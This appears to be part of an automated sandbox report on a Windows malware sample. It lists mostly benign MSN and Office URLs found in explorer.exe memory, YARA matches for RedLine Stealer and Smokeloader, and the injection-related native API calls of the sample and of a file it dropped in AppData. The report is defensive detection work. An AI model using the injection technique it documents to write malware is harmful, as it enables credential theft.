      Source: explorer.exe, 0000000B.00000003.2670022683.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/D
      Source: explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/X
      Source: explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1777648899.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 0000000B.00000002.2961877649.0000000004AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?V
      Source: explorer.exe, 00000001.00000000.1777648899.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comv
      Source: explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 0000000B.00000003.2670022683.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2681492107.00000000083D5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000083C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com30#
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 0000000B.00000003.2677069781.000000000842C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.00000000083F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEM
      Source: explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1780555667.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
